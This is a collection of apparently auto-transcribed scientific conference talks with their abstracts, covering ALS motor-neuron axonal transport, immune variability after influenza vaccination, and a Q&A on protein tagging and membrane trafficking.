that's a big discussion. Yeah, yeah, well, whether there is indeed... Yeah, yeah. But for motor neurons, there is no regeneration. That's, yeah. Also, because it's very unlikely that even when you have a new stem cell that is transformed into a motor neuron, we'll find its target. Because, well, I want to come back to that in a minute. I'm not sure whether I will get there. But the cell body of the motor neuron that is innervating your foot is just at the end of your back. So, it's an axon of one meter in some people, well, or less or more. Yeah. So, it's... Well, the first times are on the leg, very often. Yeah, yeah, yeah, yeah, yeah. So, well, yeah, you have two forms. But the most common form is where the legs and the arms are first involved in the disease. Okay. So, this is... Yeah, now I want to come to axonal transport. So, I think the introduction was already given. So, what we have is iPSCs, so induced pluripotent stem cells that are generated from fibroblasts from ALS patients. So, that... The big difference is that these cells are from patients, are human, and they have the same mutations as the patient. And they have no overexpression. That's, I think, very important to mention. So, you have the mutations in the same genetic context without any overexpression. And what is very interesting is that you can differentiate these cells into all kinds of cells, including motor neurons, and that's what you see here in this picture. So, you can keep them... Some people can keep them for 150 days. Well, we can keep them for 60, 70 days, and then they start to detach. So, you can keep them for a very long time. They form very long axons. And what you can do in these cells is you can measure axonal transport. And this is a chymograph, what you see here. So, these are cells. So, this is the cell body. These are the neurites. And this cell is loaded with a dye that is going to the mitochondria, the functional mitochondria. And what you see here then is this is the length of a neurite. And so, we have taken a picture every second. And so, when we put all these pictures, all these lines next to each other, you get what they call a chymograph. And so, a vertical line is a signal mitochondria that has not been moving. So, all the lines that go from here to there or that go from there to there are moving mitochondria. And if you know, for instance, if this is the cell body and this is the end of the neurite, so then is this anterograde transport and this is retrograde transport. And so, you can see this is the control, a control line. This is a line of a patient with a mutation that is causing ALS. But it could also have been a patient with a repeat. So, these patients show exactly the same. Overtime in culture, they don't dye by the way. That's one of our major frustrations. We can keep these cells for, yeah, months and they don't dye. But what they start to show is a defect in axonal transport. In this case of mitochondria, and so this is what I just explained, it's overtime. So at week two. Transported mitochondria, I mean they've been transported mitochondria. Yeah, mitochondria are transported along the axons. Very important because you need energy for instance at the neuromuscular junction. They're the one with the mitochondria, they're the one with the mitochondria. No, they're made in the middle of the body. It's not going to be in California. Yeah, yeah, yeah. So you can see that there are a lot of stationary mitochondria as well. So there are mitochondria that don't move, so that stay always at the same place. But the majority of mitochondria are moving in both directions. So it's not so clear why, but anyway, so they're... They're motors. Sorry? They're motors for both directions. Yeah, yeah, yeah, yeah, they're motors for both directions and that's what they do, especially in controls. So here you can see that it is developing over time. So after week two of differentiation, the transport is still okay. After three weeks, it's lower and then it's going down and if we waited longer, it would even go more. It will even become lower. It's not only mitochondria, by the way, we have been looking at other cargos. This is just an example of ER vesicles, but it could have been lysosomes. It could have been RNA, which we can also visualize. It all shows the same phenotype. Over time, you get less axonal transport. Excuse me, did you investigate the synapse? If it's the same granule formation or not, physical formation or not? Because that implies the whole... Yeah, but these cells don't form... Well, normally they should form a neuromuscular junction because these are lower motor neurons, so they don't form... And that's also what we see. They don't really form synapses. They are looking around for muscles, I suppose. And I will show you a picture where we have indeed combined motor neurons with muscles. That's what we are doing now. So we're trying to make motor neurons, muscles in a cultured dish. Do they have the arginine-containing peptide? Yes, not the ones I just showed you, but we have also IPSEs from patients with repeats, of which we have shown that they contain DPRs, also in the medium, by the way. And they also show the same axonal transport defect. So that seems to be a general... And just to show you how movies look, it's running. So this is a culture. It's a FAS patient, but it could have been a C9 patient as well. So this is the cell body, and if you look very good, you can see some movement here. So this is a situation where you don't have much transport anymore. The controls, they look like this, but I will tell you immediately what is this. So I hope you can see that there is much more transport now. So you can... If you... You can see here, for instance, this is a very nice one. It starts again. You can see it comes from here, and it's going all the way... Why do you have the H2O-KN? Yeah, that's what I'm going to tell you now. We can rescue this by incubating these cultures overnight with an H6 inhibitor. And it's a misnominator, so it's doing everything except deacetylating histones. So they have classified it as a histone deacetylase, but it is deacetylating cytoplasmic substrates. And one of the substrates are the microtubules. I will show it in a minute. So the difference between this and this is just an overnight treatment with an H6 inhibitor. By the way, we have other systems and other diseases where we also see axonal transport defects. If I ever see a situation where there is less axonal transport, I always tell my people at an H6 inhibitor, and then you get surprising results. I mean, it's always rescued. And this is, by the way, also how it looks in a control. So this is the situation. This is the patient. This is control. Whatever the mutation. What is the pressure used? The enhanced. The H6 inhibitor. What is it doing? Yeah, I will first show the cartoon. So what you have is to get normal transport, you need to have tracks, you need to have the microtubules, and they need to be acetylated. If they are acetylated, the motor proteins are well connected to these microtubules. If for one reason or another, the microtubules get deacetylated, and the protein, the enzyme that is doing that is HDAX6, histone deacetylase 6, but it should be called tubulin deacetylase instead. So then you get a situation like this, and then there is less axonal transport because the motor proteins detach. And so by taking these HX6 inhibitors, we reverse this situation into that situation. And then I go one slide back to prove that it is indeed true. So this is acetylated tubulin in patients. This is a patient. So this is the patient. This is by the way the isogenic control. So with CRISPR-Cas9 we have corrected the mutation. That's also an advantage of these IPSEs. You can just have the same line, same genetic background in just one mutation corrected. And then these are treated overnight with two different HDAX6 inhibitors, and you can see that the intensity of the acetylated tubulin is dramatically increased. And by the way, you can also see that there is a slight decrease in the mutant in comparison to the isogenic control. And that's also something we see in a lot of situations that the acetylation of tubulin is going down in disease conditions. But you can use it in a proper patient. That's a good question. There are, well, we are negotiating to start clinical trials, not in ALS, because that's still, well, we are not able to cure ALS. But we are also using the same strategies in peripheral neuropathies. And just to give you one illustration of which peripheral neuropathies we are thinking about, so you have chemotherapy induced neuropathies. And there you can, yeah, there you have similar things as here. External transport is going less well. And also acetylation of tubulin is going down. So there you could say, okay, we give Winkristin, for instance, to gather with an HX6 inhibitor to a patient in order to prevent the neuropathy from happening. Okay, it seems that I have to speed up a little bit, but I'm almost there. I just wanted to show you this conclusion, but where I also show what you see here is a two-compartment system. So here are the motor neurons cultured in one side of the dish. Then you have mini grooves. What you see here are the axons that are crossing that groove. And they make contact with what you see here in pink. These are muscle cells. And so this is very recent. So we are now also trying to measure external transport in this system. And we are also trying to figure out whether we have or whether we can get neuromuscular junctions. And I think the conclusions I've already stated them. And just to, well, make sure that you understand what we are talking about. So these are these very long axons of up to one meter. The motor neurons are in your spinal cord. And then the muscles that you have are in your arms or in your legs. And this is the problem that we hope to solve by using HX6 inhibitors. Just to wrap up, the nucleosytoplasmic transport defect could be responsible for the mislocalization. This is a two-hit model, like it is proposed in literature. Not sure whether it's completely true. The second hit could be an aberrant liquid-liquid phase separation. And then this could lead to a number of things, including, for instance, also, external transport defects. I also want to say something about whole genome sequencing. I will be very short, because that was actually what was asked. So apart from the four mutations that I have been focusing on today, there are many more genetic causes already known for the disease. And the most recent ones, because this is a function of the time, the most recent ones are the result of exome and whole genome sequencing. And that is, for the moment, a project going on in the ALS field where patients, and that's why they call it Project Mind, patients are giving their DNA. And then, well, we have to give money, or the public has to give money. You can buy the sequencing of one chromosome, or you can buy a half DNA profile of a patient. And so they want to go up to 15,000 ALS patients and 7,500 controls. In just one example that it works, there will be, because this is a slide under embargo, there will be, this will be the cover of Neuron in two weeks, where they have found mutations in KIF5A, it's a kinazine protein, so which is a motor protein, which is mutated. And what is, well, illustrated, so here you have the Axel shipping company that is transporting all these containers along the microtubules. And so apparently when you have a mutation, it doesn't work that well. I mean, it's a visual way. It's made by geneticists, by the way, but I like it. So I think it's nice, and here has to come Neuron, so it's not yet finished. Okay, I'm almost done. If you give me, can I have three more minutes? Three more minutes just to, well, to wrap up everything what is known in the field. But you have so many PIFs, so many motors. Yes, yeah, yeah, not all are mutated. I think you're all of them are affected. Yeah, no, no, no, yeah, that we don't know. Because you say every protein you look at, it's all there. The transport of everything, nothing went through. Yeah, that's right. Then every possible, it means all the motors are affected. Yeah, but we don't know how. In some cases it will be genetics. In other cases we don't know. I would like to end with a movie of three minutes, so it's not, it will not last more than three minutes. Nature Neuroscience Review asked us to summarize 20 years of research in ALS. It was not easy, but I like the end result and I want to share it with you. Amniotrophic lateral sclerosis, shortened to ALS, is a neurodegenerative disease which usually begins in adulthood and advances rapidly. It's characterized by the deterioration and loss of both upper and lower motor neurons. As the motor neuron stops sending signals, the muscles weaken, leading to paralysis. When the muscles in the diaphragm are paralyzed, this can be fatal. There is no known cure for ALS. For most people, the cause of their ALS is unknown, but some people inherit the disease from their parents. By studying the genes that are altered in these patients, scientists have pinpointed processes in the neurons that might be causing ALS. It's too early to know which of these altered processes are a result of the disease and which could be a cause, but it's clear that they affect many different aspects of the motor neuron function. Let's start in the cell body. Here, proteins that are not transported into the nucleus build up in the cytoplasm. Errors in the systems that build up and break down proteins also cause other misfolded proteins to accumulate. The different proteins can then aggregate and can become toxic to cells in several ways. For example, they can damage mitochondria, the cell's power generators. Mitochondrial damage can lead to oxidative stress, which can trigger breaks in the DNA of the cell. ALS seems to affect DNA repair processes as well. When DNA breaks are poorly repaired, it ultimately contributes to the death of the neuron. The cell's transport machinery can also be damaged. For example, ALS-affected neurons often have problems transporting RNA, proteins and vesicles, both in the cytoplasm and along the neuron's axon. These vesicles contain important cell signaling molecules called neurotransmitters. If these can't be moved along the axon or released, the neuron can't send messages to its target cells. Attach to the cytoskeleton can also cause the axon to retract. If this happens, the axon can no longer connect to the muscle nearby and can no longer signal the muscle to contract. Other cell types can also be involved in ALS. Oligodendrocytes which electrically insulate the axon and provide support to the motor neuron don't work in people with ALS. Reduced uptake of neurotransmitters by astrocytes can lead to overactivation of the receptors at the synapse and death of the neuron. Finally, astrocytes and microglia can produce factors that protect or damage motor neurons. Neuronal death occurs when excessive damaging factors are produced. Further research is needed to find out which of these many processes cause the motor neuron to generation seen in ALS patients. Targeting new drug therapies at those processes might lead to a treatment for this incurable disease. That's it. That's it. Perhaps not surprising question from me. Why do you, you're looking for money sequence subjects affected and controls? Why do we need to re-sequence control? I think they also rely on public databases but they want to, yeah, well, they want to increase the number. I think that's also why they focus much more on patients than on control. Yeah, yeah, yeah, there are. Do you know where the peptide containing arginine are located in the cells? In the cytoplasm. Not in the AR? It could be. Because AR stress is something that, yeah, yeah, yeah, yeah, yeah, it could be. I don't exclude it. So they may cause AR stress? Yeah, yeah, yeah, yeah, yeah. Yeah, that's just, that's exactly, well, the paper. That's the point that the paper that was published the day before yesterday in Nature Genetics want to make. I'm going to read the paper. Yeah, you should. It's interesting. I mean, I had to write a commentary yesterday evening so I know everything about it. Maybe you said it. I missed it. How is the transcription of the repeats? Is it, that's a polycystronic, a very long, long, long messenger which you should maybe detect? Or is it cleaved right away? And then the translation, how is that? Yeah, it's not, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, it's a full messenger. Is it? Yeah, well, but it's some, there are also people that say that it stops in the middle of the repeat. Yeah, that the transcription process, well, that you have also messengers that are... The RNAs are dilated. Could be. Yeah, otherwise you won't get the heat for the translation. Yeah, but not all these... They're not tough pieces of RNA and get translation, right? The messenger RNAs are dilated. Yeah, but I mean, these RNAs are not polyadenylated, are also not capped. They are not. So they are excised from the introns, from the... They are introns. Translation, there's part of the mRNA starting from the middle. That's the whole idea, that he doesn't... Yeah, well, I'm not so sure about that....start from the middle and that's why it was so controversial at the beginning, because there was no any precedent. But it also happens in the reverse, in the reverse way, in the antisense. So when you do a reverse, you have also mRNAs that are being translated, you have a transcript. Yeah. Are you coming from the other side? But that's not polyadenylated. It is also polyadenylated. But it isn't. It isn't. He's the expert on that. Then I should sit together next to him this evening. Yeah, I can learn more from you than... It's not polyadenylated. It won't go out of the nucleus if we ever get stuck in the brain. Okay, that's good to know. Yeah. Since this is completely multifactorial. Yeah, that's what we think. So everybody is right. Everybody is right in the field. Everybody is right in the field, right? That's the problem, yeah. But I know that's good. That's how you keep friends, yeah. Okay, if we go now to try to deal with patience. So first, yeah, where do you think one would shoot? It's a very good question. Well, the field at this moment is focusing, especially for the genetic forms, on antisense oligos. So because it's gain of function, and that's at least what we think it is for salt 1 TDP, FUS and C9 orv. So if you can prevent the mutant form from being formed. If you can prevent the translation of the mutant containing transcript, then you don't have the mutant protein and that should help. So antisense oligos is the thing people are investing a lot of money in for the moment. But that's only helpful for a limited number of patients. Let's go through the antisense, right? Yeah. I would have to do this, how? The whole life of the individual? These antisense oligos are relatively stable, but you have to re-inject, intratically, regularly. You're not going to do that. Well, it depends what kind of disease. In SMA, for instance, spinal muscular atrophy, the therapy that is there is also injection of antisense oligos. No, I realize this, right? Yeah, it's very expensive, first of all. And indeed, it's an intratical injection. You would like to find a way to maybe cross the blood-damped barrier? Yeah, yeah, yeah, indeed. Well, the easiest way to stop people from getting familial ALS is prenatal screening. That's the most obvious thing to do, and that happens already. Really? Of course. I mean, is it 100% penetrance? Yeah, close to. Not 100%, but it's close to 100%. So it justifies prenatal? Yeah, and it's a terrible disease as well. So if you can... Well, peripheral neuropathies, the inherited ones, also there you have prenatal screening already as a routine kind of thing. Although you don't die from these diseases, so it's more an ethical thing than anything else, but it happens. I mean, pretty sure that it happens. If we eliminated Hawkins, I mean, he would not go through this screen. What does he think about it? Sorry? This famous ALS patient, actually two of them, one... Well, he's not genetic. He's not genetic, so for him it doesn't help. So for him it only helps for 10%... Well, maximally for 10% of patients, 90% are not helped, so we have to continue doing research, even if we can solve all the genetic forms. Yeah, and so for the other forms, we hope that we can find a pathway, like for instance, axonal transport, that is a common mechanism also seen in sporadic ALS patients, that we can symptomatically treat these patients, and that it could help them to survive longer. Sure, but for example, you describe their situation, but then you also have a kindness... They have to run, they have to stay. Yeah, yeah, yeah, yeah, yeah. Well, you don't have to convince me that it's a complex disease. Bye. Thank you. Bye-bye, thank you for finding this. Thank you. You're speaking about detailed therapy, but what do you think about therapy, right? Chloropotent or totopotent stem cells? Is that not... Well, the problem there is... Right, because I think for brain, for pathogen, I saw a lot of... Yeah, but the problem is that you have to restore... So you have to restore functionality, so what you... If you replace, well, for instance, this motor neuron is dying, so the axonal... So, yeah, first of all, what we think is happening, that the first problems happen here, so you get denervation, then you get axonal retraction, and in the end, the motor neurons die. So what are you going to do? You're going to transplant stem cells here, and how will they find their targets one meter further away? What's their job? They should find them. Because in heart... Yeah, but what's the... It's a distance. In form, it's the way they inject, and then the cells... Yeah, but what distance do they have to cross? I think it's... I mean, this is one... Has it been tried? This is one meter. Yeah, well, stem cells... Yeah, it has been tried in China. So, I mean, and not in the best possible way, I suppose, but anyway. At a certain moment, it was a big hype in the ALS field, so people thought that they... And not for the simple reason to replace the motor neurons, but to replace the environment, the toxic environment, because, well, astrocytes and microglia also seem to play a role. So if you can replace the astrocytes, maybe then you will have a benefit. In the end, everything that they have tried failed. So, it didn't have much... I'm not excluding that it will help, but for the moment, it's not the way people are going forward, let's say, that way. Because that's a radical therapy. Yeah, but here, I mean, an axon... Well, we are so happy that we can bridge... And the culture, we can bridge maybe... Well, it's a few hundred micrometers, eight hundred micrometers, I think. And that is already a challenge. So how can you get it one meter? I mean, hopefully, well, yeah. Hopefully, I wouldn't... Yeah. You know, other neurons, mRNA translation is mostly concentrated at the synapse, right? So the question here, I don't know about motor neurons. Yeah, yeah, yeah. Yes, yes, indeed. You don't need to travel, you don't have to. Yeah, absolutely. No, no, there is clearly translation... There is clearly translation here at the sinus for the simple reason. If something has to be made here, and the message has always to come from the nucleus, that will take too much time. So if there is something needed here to react very fast to whatever situation, local translation is the only way to do that. And there is RNA there, so that's... And there is RNA transport as well. Okay, thank you. Thank you very much.
|
The increasing number of patients suffering from neurodegenerative diseases in our aging Western society becomes a major burden to our social care system. There is currently no cure for any of these disorders. This lack of effective therapies is in a large part due to an insufficient understanding of the etiology and pathogenesis of neurodegenerative disorders. One of the most dramatic neurodegenerative disorders is amyotrophic lateral sclerosis (ALS). It is a fatal neurodegenerative disorder primarily affecting the motor system. The disease presents with progressive muscle weakness and median survival is limited to 36 months after the disease onset. No effective therapies exist. In about 10% of the patients, ALS is a familial disorder. Mutations in 4 different genes (C9orf72, SOD1, TARDBP and FUS) explain a large proportion of these, but the cause of the disease remains enigmatic for the majority of patients. Over the last 2 decades, multiple clinical trials had only negative results, in part because our understanding of the disease mechanisms is insufficient to define clear therapeutic targets. Even in the light of an unknown disease cause, a better understanding of the molecular mechanisms that affect the severity of the disease would greatly advance the ALS field. A considerable degree of heterogeneity exists between patients in terms of both the age of onset and the disease progression rate. This suggest that important genetic modifiers exist. Modifiers of disease progression in ALS are candidate targetsfor therapeutic interventions. Within the Project MinE consortium, whole genome sequencing (WGS) is already performed on almost 5000 ALS patients and more than 2000 controls. This international collaborative effort is unprecedented and uses the state of the art technology for WGS. The analysis of modifiers of age of onset and of survival of the whole consortium will provide information on genetic modifiers. The hits are prioritized based on the likelihood of being detrimental on protein and regulatory level using various bio-informatical prediction tools. Subsequently, validation of these hits is performed in vitro and in vivo. In vitro models consist of different cell types derived from induced pluripotent cells (iPSCs) derived from ALS patients. In vivo models range from Drosophila, zebrafish and rodents. By performing all these experiments, we will get a better understanding of the molecular mechanisms underlying the disease that could also be responsible for the wide range in age of disease onset and survival after disease onset. Altogether, this could pave the way for the development of novel therapeutic strategies to treat ALS.
|
10.5446/50896 (DOI)
|
And it is known that different people show different immune responses to the same immunological perturbations, such as pollen or vaccines. For example, only a fraction of people is allergic to pollen, or some people respond well to vaccines, but others don't respond so well. So the question is, how different they are? How different are they? And why are they different? And the approach of population immunology that measures a lot of people and immune responses over the course of time can potentially answer this question. So it's immediately different, because people say it's immunological responses that are allergic, they're instantaneous. But immunity response takes about three weeks, while it's immunological. This alligates instantaneous and people have, you know, the first exposure. So you don't even have time to develop any immune reactions. So why is it called immunology? Okay, so I agree that these two types of responses are different, immunologically different, but they share some characteristics, because they are related to some genetic background related to... Genetic here, but why they're both... Not even logical, they sound like a cancer. Okay, so maybe I can answer the general questions later. No, no, it's still, I mean, just answer, because it's confusing. It's not even logical. It is, it is. It is immunological. It's a different immunopath, it's still immunological. So it's an immune system which always reacts to anything, yeah? It's not learned. So for it is ready to go, or it has to be built, and then it goes. Okay. Thank you. And so I'm interested in the approach of population immunology. And we are... This time we examined the cohort of 300 volunteers who cooperated with us and received seasonal influenza vaccine in 2011. The cohort consisted of 100 males and 200 females, age 32 to 66, so they are middle-aged people. And we used trivalent inactivated influenza vaccine containing hemagglutinin proteins of these virus stocks. So they are very usual ones. And we collected peripheral blood on four time occasions, namely before vaccination and one day after and one week after, or three months after, vaccinations. And we analyzed these blood samples. And individual blood samples were split into two tubes. One tube was used for measuring six V cell markers like this. The other tube was used for measuring T cell markers like this. So as you see, they are very general markers classifying the basic subsets of V cells and T cells. And in flow cytometry, each of these markers is measured for each single cell in the blood. So what we get is a point cloud of cells in a multi-dimensional space. So seven axes, seven dimensions for T cells and six dimensions in V cells. And usually in immunology studies, we select only two axes and show two dimensional plots like this. But please note that this is only a fraction of a much bigger picture. So to analyze these multi-dimensional space, we devised a new method called lavender. Lavender is intended to uncover the dilatant axes that can explain the variability of the dataset. Suppose we have four samples showing these kinds of immunological distributions. And looking at these pictures, you might think that top two pictures might be somewhat similar because they belong to the same participant number three. But they might be a little bit different from the bottom two pictures which belong to the participant number six. So we want to quantify these differences and for that we follow the four steps. In step one, we perform density estimation of these point clouds. So these raw data are very complicated. So we determine a grid and calculate the density of cells using K-nearest-neverex method. That amounts to basically smoothing the distribution. And this method is non-parametric. That means it doesn't presuppose any distributions, be it normal or Poisson or uniform. So it can deal with any complex shape of point clouds in an unbiased manner. And in step two, we measure distances between distributions using the concept of a callback library of data in information science. And we give it a little trick to make it a genuine bona fide metric. And we use the, actually we use the distance. And in that nutshell, it is, it tends to emphasize the accumulated peaks and focus on accumulated peaks and tries to measure the intensity or the positions of these accumulated peaks. But other distances, if you like, can be used. And in step three, based on the distances we just measured, we reconstruct samples in a new coordinate space that we call lavender space. That uses the algorithm of multidimensional scaling. And like this. So the distances between points reflect the distances between original samples. So this is a huge dimensionality reduction from the very complicated raw data to just two or three dimensions. And then we can analyze access in this lavender space. So this is a result of dimensionality reduction for B cell samples and T cell samples. So as you can see, each dot corresponds to each sample taken from participants. And different colors denote different days. Zero, day one, day seven, day ninety, in which samples were taken. And it might be difficult to see, but you see that the same color, the same day samples form a cluster, but they are somewhat dispersed in a certain direction. And this trend is same for T cells. Same same day, same day, suppose a formal cluster like black, but they are dispersed. And this is a two dimensional projection that is easier to see. And we see that intuitively. And for these examples of this horizontal axis corresponds to the time dependent axis that shows the difference between days and the horizontal vertical axis vertical axis. This is a corresponding to the individuality that shows the variability between each samples, same day samples. This applies to T cells as well. This time the vertical axis is more related to time. And the horizontal axis shows the variability or individuality between samples. So these are very simple intuitive arguments, but we can make it rigorous by using tensor decomposition. So T cells are basically in this context are just three dimensional versions of matrices having dimensions and participants or different days and regular coordinates. And these tensor can be decomposing to more simple rank one tensors like this. Actually the sum of rank one tensors. It's called Cp decomposition. So if you look at each component and see the days component. So this is an ideal case, but if the days component is time dependent, this component can be considered to be time dependent. And if it is not dependent on time, it can be considered to be time independent. And actually, and we were able to separate the D'Arabenda coordinates into time dependent and individuality axis using tensor decomposition. So we analyze the individuality axis and follow it over time. And first we separated the participants into two groups based on the value of the individuality axis on day zero. So group one has a lower value of the individuality axis, whereas group two people have higher values. And as we follow over time, the axis, the value of the axis is relatively stable, which means that group one people tend to stay low, whereas group two people tend to stay high, even, but with occasional switching orders for these cells. And this trend is more conspicuous in T cells, where a group at the individuality axis is more stable than the B cell samples. And we further looked at, we tried the biological characterization of the axis at day zero, and we found that when we looked at white blood cell differential counts, a group one people had more lymphocytes that is related to adaptive immunity or producing antibodies. And group two people had more neutrophils that were related to innate immunity or inflammation. So group one seems to be more ready to respond to vaccine even before vaccination. And this trend was verified when we looked at B cell subsets. And this is the lineage of B cell differentiation from immature to naive to finally to memory or antibody producing plasma cells. And we found that group one people had more plus a larger fraction of plasma cells than group two, supporting that group one group one people are more ready to respond. So to conclude, we analyzed variability in immune system in a cohort of 300 volunteers who received seasonal influenza vaccine. And our lavender analysis enables us to extract critical access of individuality in a supervised and biased manner. In fact, in our data set, it uncovered the baseline immunological characteristics under the new response to the vaccine, i.e. adaptive, that is adaptive immunity dominant or immunity dominant. So this kind of answers the how different question. But I think that to answer the why different question, we need to look at more specific genes or specifics or subsets that were discovered in our data set. So I would like to acknowledge causes, especially Daigo Kadaf is a graduate student in Yabba, the lab, the Yama lab. And Dr. Seto, who is an immunologist who performed experiments in Matsuda lab. Thank you very much. I don't think I understood because what you showed is that there are different populations that are more, basically different immune profiles. But I didn't see the connection between that and how they are responding to the vaccination. And so, it also ignores that the patients would have been exposed in different ways to the flu historically as they were in childs, etc. So that connection is now there. So how to evaluate the output is an important question. And we measure the output of this system using the antibody titers. But unfortunately, the antibody titers were not in clear linear correlations with these coordinates we measured. But as you mentioned, these small antibody titers are more correlated with vaccination history. That is reported in other studies as well. So the people who have never been vaccinated show the larger response to the vaccination. And I think in my opinion, the antibody titers are accumulation of the workings of plasma cells. So that's kind of an integration. So I don't think it's so unnatural that if the antibody titers don't show linear relationships with what we do. So our coordinates are correlated with the fraction of plasma cells, but we're not directly correlated with antibody titers. So that's maybe, as you said, there may be a difference in concepts or what we... So yeah, and we need to be more specific in discussing these results, I think. It's related to this question. So as you move this, how do you define T and B cells population? They are very heterogeneous populations. How do I define which populations? T and B cells. Yeah, so there are a large amount of studies related to defining various subsets of B cells and T cells, which should I use? And they are just very basic ones. And for example, in a recent study, you've shown that vaccination efficacy is related to the specific subset called follicle helper follicle T cells. That was not measured in this study. So I agree that this study is kind of simplistic in terms of immunology, but we think that the same method can be used for analyzing more detailed data. One more question. You have group one and two. Do they correlate with age? So that could be a bit correlated? No, there are no...at least statistically no difference between group A and group B. And I found that one...I didn't remember which was that, but in one very volatile...in one curve showed a very volatile movement. That was young female. Young females...my delusional idea is that young females are more prone to...so immunological...more active maybe, immunologically. Alright, thank you very much, Nintoshi. Thank you very much.
|
The human immune system is known to be highly variable among individuals, but it is not well understood how the variability changes over time, especially when faced with external perturbations. Here we analyzed individual variability in the immune system in a cohort of 301 Japanese volunteers who received the same trivalent inactivated influenza vaccine in winter 2011. To extract important variability axes from single-cell measurements in a data-driven and unsupervised manner, we devised a computational method termed LAVENDER (latent axes visualization and evaluation by nonparametric density estimation and multidimensional scaling reconstruction). It measures distances between samples using k-nearest neighbor density estimation and Jensen-Shannon divergence, then reconstructs samples in a new coordinate space, whose axes can be compared with other omics measurements to find biological information. Application of LAVENDER to multidimensional flow cytometry datasets of B and T lymphocytes (taken before and 1, 7, 90 days after vaccination) uncovered an axis related to time and another axis related to individuality. We found that the values of the individuality axis were positively correlated between different days, suggesting that the axis reflects the baseline immunological characteristics of each individual. In fact, the value of the axis before vaccination was highly correlated with the neutrophil-to-lymphocyte ratio, a clinical marker of the systemic inflammatory response; this was verified by the transcriptome analysis of peripheral blood. These results demonstrate that LAVENDER is a useful tool for identifying critical heterogeneity among similar but different single-cell datasets.
|
10.5446/50898 (DOI)
|
I want to follow up when I started asking David in the hallway. And that is all your localization and analysis is done with these GFP RFP fusions. And the question is, how much are they functionally compromised and how do you evaluate whether they functionally compromised? In budding yeast, we have, so since my lab does both, we have much more sensitivity because you use the cell, usually you can make it easily the only copy of the whatever gene and especially you know about it's what phenotypes there are from loss of function. You can look for or genetic interactions. As I mentioned in the hallway, even I think that you always compromise function when you put a tag on a protein and I think people try to sweep that under the rug but you know it varies. I think in most cases you preserve the function surprisingly well. But there are things you can do like assess the pathway. If you're looking at endocytosis, you can check your line and make sure the rates of endocytosis are normal. You can look at different components of a complex and see if they have similar behavior. I think you always need to be cautious when you've generated like 120 lines. Yeah, well money more yeast. That's mammalian lines. Yeah. The mammalian you know it's they're diploid so if you tag or if they're hella cells they have six copies. How many copies you tag it can definitely make a difference in the actually the Allen Institute so I'm a senior investigator or whatever. I have some role that the Allen Institute where they're doing this very systematically and very rigorously. They find that for some genes they don't recover any diploid. When both alleles are edited they only get single allele edited which is a guess is that it's because it might be lethal to edit both or at least selected against some kind of growth disadvantage. So in that case actually what we've done in mammalian cells and what the Allen Institute tries to do is to go to experts in the field who have like leave it to experts to study a process if you tag a protein because the Allen Institute doesn't have expertise in all the different cellular processes they might go to your lab and say what would you tag in the proteasome or something like that you know and what what evidence do you have that that was functional. But things like what linker you use can make a huge difference night and day. So it definitely does deserving of care. What are you trying to do to just tag systematically tag all the. The Allen Institute they're they are tagging so you can go to their web page the Allen Institute for Cell Science it's too bad Leonard isn't here I meant to mention to him they have they put they have tons of 3D imaging data for all these proteins it's all the raw data is put on the web immediately so people who have the computational skills can look at the images but they are doing they're they originally were going to try to tag up essentially everything but they decided instead to be very to thoroughly characterize all their cell lines and instead make representatives so every major organelle is tagged already every major cytoskeletal element cell adhesion molecules now they're working on signal transduction proteins and they're all going to be in the same genetic background and it's all available to the public at their cost at their cost so Berkeley has acquired the first set as a resource for people on campus and you know it's a lot I think like model organisms C elegans or flies where you have so everybody in different labs you know is comparing the same type of cell which you know now I know in my field if my even if my lab works on a hella cell on the lab down the hall works on he was there not at all the same he was so it's not even close to a real cell exactly so that's you know so that's you know it's timed you know to start working on things that are more physiological. That's what I mean that you rapidly we will have somehow in the old and stability lab to use this kind of cells to be sure to publish for instance is it is it to be sure I mean somehow that everybody is talking on the same base is it it would be a trend I think it would be a positive trend yeah I think it's like that I just I mean I'm not in charge of all of it you know also by all. One more question the GFB GFB is a very stable protein so when you make a fusion you could stabilize short-list protein and this could have an effect which is not natural that stable short-list protein could be stable so this could be a little bit of a problem. I don't disagree with that. It's just the only that it's one it's a way to look. No but you can test you can test you can look at the half-life and test. So we're on the system not by over gene expression but stabilization. Yes yes and we try also sorry we try also to like when you see something with GFP to see if it's really true or so with human fluorescence where it's no it's endogenous. This was done to overcome the over expression but it's not always going to do that. Okay somebody wanted to say something like. You have the question. Yeah my point comment GFP is of course is good but there is a choice of different tags as well like halo tags or snap tags so they have big advantages like you can use the fluorophore you want for whatever kind of photo oxidation or threat it's much more efficient with these tags here so I wonder why GFP is older so maybe it was chosen because the project was started some time ago but not sure that today I will choose GFP. Yeah I mean we use all those tags and some people like the cell atlas the Chan Zuckerberg cell atlas they're using my GFP. The Chan Zuckerberg is doing sort of the opposite approach of the Allen Institute. This new center Chan Zuckerberg so all these rich people are starting institutes now in the US and so they they're using this split GFP where you put an 11 amino acid tag and then you just use a cell apparent cell line that expresses the rest of the GFP it makes a beta barrel so one of the yeah so and then so that's a smaller tag but it makes GFP so there's pros and cons of different things. We had a question about first time after that. Mine is a very general one outside of the field and I guess mainly Judith Alberto maybe the others. So the transport complexes have been studied mainly in the context of their original mutant phenotypes in other words they interrupt one step in some transport pathway. We're now starting to find them in more places I guess from a person who's interested in more regulatory mechanism I'm curious how general this sort of multifunctional combinatorial mechanism is going to be. And also we've learned quite a bit about signaling out from the transport complexes from unfolded proteins and such. How about signaling in I mean what do we know about signals going into the transport machineries which parts of the signaling machinery are regulated by what kinds of mechanisms. So the first question I think multitasking proteins it's an emerging team and the list of proteins that are known to have multiple tasks is growing. Also some proteins that we know very long already for example I have been talking about the menosexal satriceptor that is involved in transport of lysoma enzymes but it's also involved in endocytosis of IGF2 and the fields that are looking at IGF2 endocytosis of menosexal satriceptor trafficking are kind of apart strangely enough but it's the same receptor. And for signaling for example VPS3 was so part of the Corvett was originally identified as TTFP rep1 and it's a SMET4 binding protein and that is involved in the TTF beta signaling pathway. So that is what I know but I think that we have to be very open to this that one protein can have multiple functions. You want to add? I agree. I think it's sort of disturbing. It would be much easier to think one function, one protein but this moonlighting proteins appear to be very many actually. But I don't think I don't know of any systematic database or systematic study or collection of data about this moonlighting phenomenon. You find a lot of this in the literature so I guess there are many but there is nothing systematic and clear done already. So for your question about the signaling trafficking coupling I think a group of four translocation is a very good example. So it's a well-known AS1-6-TIC can be phosphorated by AKT in the insulin signaling pathway but that's just a part of the story. So David James did a whole proteomic analysis and found hundreds of proteins could be phosphorated upon insulin stimulation and it's still open. Are these phosphorations important or not? It's going to be a long way. At least there are some candidates so far. I think what you're asking to me it depends on exactly what your question is. A RAB 